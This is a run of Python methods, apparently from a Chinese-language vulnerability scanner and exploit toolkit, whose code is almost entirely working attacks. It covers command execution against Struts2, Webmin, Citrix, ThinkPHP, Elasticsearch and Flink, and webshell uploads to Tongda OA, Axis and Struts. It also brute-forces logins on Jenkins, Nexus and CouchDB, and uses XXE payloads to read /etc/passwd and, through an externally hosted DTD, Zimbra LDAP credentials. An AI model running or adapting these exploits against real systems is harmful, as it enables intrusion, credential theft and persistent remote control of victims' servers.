def run(self): try: if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url vuln_url = self.url + "/password_change.cgi" check_req = request.post(url=vuln_url, headers=self.headers, data=self.check_payload) if check_req.status_code == 200 and " " in check_req.text and self.capta in check_req.text: cmd_req = request.post(url=vuln_url, headers=self.headers, data=self.cmd_payload) pattern = re.compile( r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL) cmd_result = pattern.findall(cmd_req.text)[0] print("存在CVE-2019-15107 任意代码执行漏洞,执行whoami命令结果是:", cmd_result) return True else: print("不存在CVE-2019-15107 任意代码执行漏洞") return False except Exception as e: print(e) return False pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url if '.action' not in self.url: self.url = self.url + '/integration/saveGangster.action' try: check_req = request.post(self.url, headers=self.headers, data=self.check_data) if self.capta in check_req.text: cmd_req = request.post(self.url, headers=self.headers, data=self.cmd_data) cmd_str = re.sub('\n', '', cmd_req.text) result = re.findall('Gangster (.*?) added successfully', cmd_str) print('存在S2-048漏洞,执行whoami命令成功,其结果为:', result) return True else: print('不存在S2-048漏洞') return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url try: check_req = request.post(self.url, headers=self.headers, data=self.check_payload) hostname = urlparse(self.url).hostname port = urlparse(self.url).port url = 'http://' + str(hostname) + ':' + str(port) check_req1 = request.get(url + '/check.txt', headers=self.headers) if check_req1.status_code == 200 and self.capta in check_req1.text: cmd_req = request.post(self.url, headers=self.headers, data=self.cmd_payload) cmd_req1 = request.get(url + '/cmd.txt', headers=self.headers) print('存在S2-052漏洞,执行whoami的结果为:', cmd_req1.text) return True else: return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url try: check_req = request.post(self.url, headers=self.headers, data=self.check_data) check_pattern = re.compile('<.*?name="password" value="(.*?)" ') check_result = check_pattern.findall(check_req.text) if check_result[0] == '80147': print('存在S2-001漏洞,执行id命令结果为:\n') cmd_req = request.post(self.url, headers=self.headers, data=self.cmd_data) print(cmd_req.text) return True else: print('不存在S2-001漏洞') return True except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url if '.action' not in self.url: self.url = self.url + '/hello.action' try: check_req = request.post(self.url, headers=self.headers, data=self.check_payload) print() if check_req.status_code == 200: if self.check_count(check_req.text, 'OS:Linux') == 2: cmd_req = request.post(self.url, headers=self.headers, data=self.cmd_payload) cmd_str = re.sub('\n', '', cmd_req.text) result = re.findall('<p>Your url:(.*?)</p>', cmd_str) print('存在S2-053漏洞,OS为Linux,执行whoami命令成功,其结果为:', result) return True if self.check_count(check_req.text, 'OS:Windows') == 2: cmd_req = request.post(self.url, headers=self.headers, data=self.cmd_payload) cmd_str = re.sub('\n', '', cmd_req.text) result = re.findall('<p>Your url:(.*?)</p>', cmd_str) print('存在S2-053漏洞,OS为Windows,执行whoami命令成功,其结果为:', result) return True else: return False except Exception as e: print(e) return False finally: pass
def run(self): try: if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url data_req = request.post(self.url + '/website/blog/', data=json.dumps(self.data_payload), headers=self.headers) check_req = request.post(self.url + '/_search?pretty', data=json.dumps(self.check_payload), headers=self.headers) if check_req.status_code == 200 and self.capta in json.loads( check_req.text)["hits"]["hits"][0]["fields"]["lupin"][0]: print('存在CVE-2015-1427漏洞') cmd_req = request.post(self.url + '/_search?pretty', data=json.dumps(self.cmd_payload), headers=self.headers) print( '执行whoami命令结果为:', json.loads( cmd_req.text)["hits"]["hits"][0]["fields"]["lupin"][0]) return True else: print('不存在CVE-2015-1427漏洞') return False except Exception as e: print(e) print('不存在CVE-2015-1427漏洞') return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url url = self.url + "/j_acegi_security_check" for user in open('app/username.txt', 'r', encoding='utf-8').readlines(): user = user.strip() for pwd in open('app/password.txt', 'r', encoding='utf-8').readlines(): if pwd != '': pwd = pwd.strip() data = { 'j_username': user, 'j_password': pwd, 'from': '', 'Submit': 'Sign in' } try: req = request.post(url, headers=self.headers, data=data) if req.status_code == 302 and 'ACEGI_SECURITY_HASHED' not in req.headers[ 'Set-Cookie']: result = "user: %s pwd: %s" % (user, pwd) print('存在Jenkins弱口令漏洞,弱口令为', result) return True except Exception as e: print(e) finally: pass print('不存在Jenkins弱口令漏洞') return False
def update_queryresponsewriter(self, core_name_url): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 'Content-Type': 'application/json' } payload = ''' { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }''' try: req = request.post(core_name_url, headers=headers, data=payload) if req.status_code == 200 and 'responseHeader' in req.text: exp_url = core_name_url[:-7] self.send_exp(exp_url) else: print("不存在Solr远程代码执行漏洞") except Exception as e: print(e) print("不存在Solr远程代码执行漏洞") finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url try: check_req = request.get(self.url + "/services/AdminService", headers=self.check_headers, data=self.check_payload) if check_req.status_code == 200 and "processing</Admin>" in check_req.text: print("存在Axis漏洞") shell__req = request.post(self.url + "/services/RandomService", data=self.shell_payload, headers=self.shell_headers) cmd_req = request.get(self.url + "../shell.jsp?c=echo%20" + self.capta, headers=self.headers) if cmd_req.status_code == 200 and self.capta in cmd_req.text: print("上传的jsp文件路径为:", self.url + "../shell.jsp") else: print("不存在Axis漏洞!") except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url url = self.url + "/service/rapture/session" for user in open('app/username.txt', 'r', encoding='utf-8').readlines(): user = user.strip() for pwd in open('app/password.txt', 'r', encoding='utf-8').readlines(): if pwd != '': pwd = pwd.strip() data = { 'username': base64.b64encode(user.encode()).decode(), 'password': base64.b64encode(pwd.encode()).decode() } try: req = request.post(url, headers=self.headers, data=data) if req.status_code == 204 or req.status_code == 405: result = "user: %s pwd: %s" % (user, pwd) print('存在Nexus弱口令漏洞,弱口令为', result) return True except Exception as e: print(e) finally: pass print('不存在Nexus弱口令漏洞') return False
def execute_cmd(self, command): headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36', 'Content-Type': 'application/json;charset=utf-8', } jar_hash_name = self.check_jar_exsits() data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command if jar_hash_name: execute_cmd_url = self.url + '/jars/' + jar_hash_name + '/run?entry-class=Execute&program-args="%s"' % command else: self.upload_execute_jar() jar_hash_name = self.check_jar_exsits() if jar_hash_name: execute_cmd_url = self.url + '/jars/'+ jar_hash_name + '/run?entry-class=Execute&program-args="%s"' % command else: return False try: r1 = request.post(execute_cmd_url, headers = headers, data = data) match = re.findall('\|@\|(.*?)\|@\|', r1.text) self.delete_exists_jar(jar_hash_name) if match: if match[0][:-2]: return match[0][:-2] else: return "result is blank" else: print('不存在任意Jar包上传导致远程代码执行漏洞') return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url try: newbm_url = self.url + '/vpn/../vpns/portal/scripts/newbm.pl' headers = { 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)', 'Connection': 'close', 'NSC_USER': '******' % self.cdl, 'NSC_NONCE': 'nsroot' } payload = "url=http://example.com&title=" + self.cdl + "&desc=[% template.new('BLOCK' = 'print `" + self.cmd + "`') %]" req = request.post(url=newbm_url, headers=headers, data=payload) if req.status_code == 200 and 'parent.window.ns_reload' in req.content: print('存在CVE-2019-19781漏洞,上传的文件为:', newbm_url) self.xml_url(url, cdl, cmd) return True else: print('不存在CVE-2019-19781漏洞') return False except Exception as e: print(e) print('不存在CVE-2019-19781漏洞') return False finally: pass
def run(self): Url_Payload1 = "/bsh.servlet.BshServlet" Url_Payload2 = "/weaver/bsh.servlet.BshServlet" Url_Payload3 = "/weaveroa/bsh.servlet.BshServlet" Url_Payload4 = "/oa/bsh.servlet.BshServlet" Data_Payload1 = """bsh.script=exec("whoami");&bsh.servlet.output=raw""" Data_Payload2 = """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw""" Data_Payload3 = """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami""" for Url_Payload in (Url_Payload1, Url_Payload2, Url_Payload3, Url_Payload4): url = self.url + Url_Payload for Data_payload in (Data_Payload1, Data_Payload2, Data_Payload3): try: http_response = request.post(url, data=Data_payload, headers=self.headers) #print http_response.status_code if http_response.status_code == 200: if ";</script>" not in (http_response.content): if "Login.jsp" not in (http_response.content): if "Error" not in (http_response.content): print("存在E-cologyOA_RCE Vulnerability") #print("Server Current Username:{0}".format(http_response.content)) return True except Exception as e: #print(e) pass print("不存在E-cologyOA_RCE Vulnerability") return False
def run(self): """ 执行命令 :param: :return True or False """ try: if self.check(): cmd_req = request.post(self.payload_url, headers=self.headers, data=self.cmd_payload) if cmd_req.status_code == 200: print('存在CVE_2019_16759_Bypass 漏洞,执行whoami命令结果为:', cmd_req.text.strip()) return True else: return False else: return False, '不存在Bypass CVE-2019-16759漏洞' except Exception as e: print(e) return False finally: pass
def run(self): """ 检测是否存在漏洞 :param: :return str True or False """ try: if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url if '.action' not in self.url: self.url = self.url + '/user.action' check_req = request.post(self.url, data=self.check_payload) if self.capta in check_req.text and check_req.status_code == 200: return True else: return False except Exception as e: print(e) return False finally: pass
def run(self): """ 检测是否存在漏洞 :param: :return str True or False """ if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url try: check_req = request.post(self.url, headers=self.headers, data=self.check_data) check_pattern = re.compile('<.*?name="password" value="(.*?)" ') check_result = check_pattern.findall(check_req.text) if check_result[0] == '80147': return True else: return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url data = """<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover> """ try: req = request.post(self.url + '/Autodiscover/Autodiscover.xml', headers = self.headers, data = data) if 'Error 503 Requested response schema not available' in req.text: print('存在CVE-2019-9670 XXE读取漏洞') return True else: print('不存在CVE-2019-9670 XXE读取漏洞') return False except Exception as e: #print(e) print('不存在CVE-2019-9670 XXE读取漏洞') return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url url = self.url + "/_session" for user in open('app/username.txt', 'r', encoding='utf-8').readlines(): user = user.strip() for pwd in open('app/password.txt', 'r', encoding='utf-8').readlines(): if pwd != '': pwd = pwd.strip() data = {'name': user, 'password': pwd} try: req = request.post(url, headers=self.headers, data=data) if req.status_code == 200 and 'AuthSession' in req.headers[ 'Set-Cookie'] and json.loads( req.text)['ok'] == True: result = "user: %s pwd: %s" % (user, pwd) print('存在CouchDB弱口令漏洞,弱口令为', result) return True except Exception as e: print(e) print('不存在CouchDB弱口令漏洞') return False
def upload_jspshell(self, url, path): webshellpath = "'" + path + '/' + "/test.jsp" + "'" Headers = { 'ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'User-Agent': 'Mozilla/5.0 (compatible; Indy Library)' } payload = "?redirect:${%23path%3d" payload += webshellpath payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println(" payload += '"' + path + '/test.jsp' + '+Get Shell!!!"' payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}" url += payload try: req = request.post(url, data=self.jsp_payload, headers=Headers) if req.text.find('<html') == -1: print( '上传webshell文件成功,webshell文件路径为:', self.url.split('/')[0] + '//' + self.url.split('/')[2] + '/test.jsp') else: return 'Fail.....>_<' except Exception as e: return str(e)
def run(self): if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url self.get_kibana_version() if self.version == '9.9.9' or not self.version_compare("6.6.1", self.version): return False headers = { 'Content-Type': 'application/json;charset=utf-8', 'Referer': self.url, 'kbn-version': self.version, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', } data = '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' try: r = request.post(self.url + "/api/timelion/run", data = data, headers = headers) if r.status_code == 200 and 'application/json' in r.headers.get('content-type', '') and '"seriesList"' in r.text: print("存在CVE-2019-7609漏洞") #self.reverse_shell('127.0.0.1', '10000') return True else: print("不存在CVE-2019-7609漏洞") return False except Exception as e: print(e) return False finally: pass
def run(self): try: if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url cmd_request = request.post( self.url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=self.data, cookies={ 'ctr_t': '0', 'sid': '123456789' }) if cmd_request.status_code == 200 and self.capta in cmd_request.text: result = cmd_request.text.split()[-2].replace('},', '') print("存在CVE-2020-7980漏洞,执行结果为:", result) return True else: print("不存在CVE-2020-7980漏洞") return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url try: check_req = request.post(self.url, headers = self.headers, data = self.check_data) if self.capta in check_req.text: cmd_req = request.post(self.url, headers = self.headers, data = self.cmd_data) print('存在S2-046漏洞,执行whoami命令成功,结果为:', cmd_req.text) return True else: print('不存在S2-046漏洞!') return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url check_req = request.post(self.url, data=self.check_data) try: if check_req.status_code == 200 and self.capta in check_req.text: cmd_req = request.post(self.url, data=self.cmd_data) print('CVE-2019-16759漏洞,执行whoami命令成功,执行结果为:', cmd_req.text) return True else: return False except Exception as e: print(e) return False finally: pass
def run(self): try: name_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" name_result = request.post(self.url + '/ispirit/im/upload.php', headers=self.headers1, data=name_data) name = "".join(re.findall("2003_(.+?)\|", name_result.text)) check_data = { "json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo %s" % (self.capta) } check_result = request.post(self.url + '/ispirit/interface/gateway.php', headers=self.headers2, data=check_data) if check_result.status_code == 200 and self.capta in check_result.text: print("存在通达OA可执行任意命令漏洞,执行whoami漏洞结果为:") cmd_data = { "json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % "whoami" } cmd_result = request.post(self.url + '/ispirit/interface/gateway.php', headers=self.headers2, data=cmd_data) print(cmd_result.text) return True else: print("不存在通达OA可执行任意命令漏洞") return False except Exception as e: print(e) print("不存在通达OA可执行任意命令漏洞") return False finally: pass
def run(self): try: if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url if 'index.php' not in self.url: self.url = self.url + '/index.php?s=captcha' if 'index.php' in self.url and '/?s=captcha' not in self.url: self.url = self.url + '/?s=captcha' check_req = request.post(self.url, data = self.check_payload, headers = self.headers) if check_req.status_code == 200 and self.capta in check_req.text: cmd_req = request.post(self.url, data = self.cmd_payload, headers = self.headers) print ('存在ThinkPHP5 5.0.23 远程代码执行漏洞,执行whoami命令成功,执行结果是:', cmd_req.text.split('\n')[0]) return True else: print('不存在ThinkPHP5 5.0.23 远程代码执行漏洞') return False except Exception as e: print (e) return False finally: pass
def get_admin_token(self): self.headers[ "Cookie"] = "ZM_ADMIN_AUTH_TOKEN=" + self.low_priv_token + ";" self.headers["Host"] = "foo:7071" print("[*] Get Admin Auth Token By SSRF") pattern_auth_token = re.compile(r"<authToken>(.*?)</authToken>") req = request.post( self.url + "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap", headers=self.headers, data=self.auth_body) self.admin_token = pattern_auth_token.findall(req.text)[0]
def upload_execute_jar(self): upload_jar_url = self.url + "/jars/upload" file_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAAAAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAKVkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLvCGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujCQNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJNaFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Qo0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNMKA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjoRF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqps0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJcVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEsOJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6EjptI4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IOYg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQAFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUGAAAAAAMAAwC4AAAArgQAAAAA') files = { 'jarfile': (self.upload_jar_name, file_content, 'application/octet-stream') } try: req = request.post(upload_jar_url, headers = self.headers, files = files) return True except Exception as e: print(e) return False
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url try: dtd_url = "https://k8gege.github.io/zimbra.dtd" """ <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> """ xxe_data = r"""<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "{dtd}"> %dtd; %all; ]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema> </Request> </Autodiscover>""".format(dtd=dtd_url) req = request.post(self.url + "/Autodiscover/Autodiscover.xml", headers=self.headers, data=xxe_data) if 'Error 503 Requested response schema not available' in req.text: print('存在CVE-2019-9621 任意代码执行漏洞') pattern_name = re.compile( r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>" ) pattern_password = re.compile( r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>" ) self.username = pattern_name.findall(req.text)[0][2] self.password = pattern_password.findall(req.text)[0][2] self.get_low_token() self.get_admin_token() self.upload() return True else: print('不存在CVE-2019-9621 任意代码执行漏洞') return False except Exception as e: print(e) print('不存在CVE-2019-9621 任意代码执行漏洞') return False finally: pass
def run(self): try: if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url if '.action' not in self.url: self.url = self.url + '/user.action' check_res = request.post(self.url, data=self.check_data) check_str = self.filter(list(check_res.text)) if check_res.status_code == 200 and len( check_str) < 100 and self.capta in check_str: cmd_res = request.post(self.url, data=self.cmd_data) cmd_str = self.filter(list(cmd_res.text)) print('存在S2-012漏洞,执行whoami命令成功,执行结果是:', cmd_str) return True else: #print('不存在S2-012漏洞') return False except Exception as e: print(e) return False finally: pass
def run(self): if not self.url.startswith("http") and not self.url.startswith( "https"): self.url = "http://" + self.url config_url = self.url + '/solr/demo/config' update_url = self.url + '/solr/demo/update' try: config_req = request.post( config_url, headers=self.headers, data=self.config_payload, ) update_req = request.post(update_url, headers=self.headers1, data=self.update_payload) print('存在CVE-2017_12629漏洞') return True except Exception as e: print(e) print('不存在CVE-2017_12629漏洞') return False finally: pass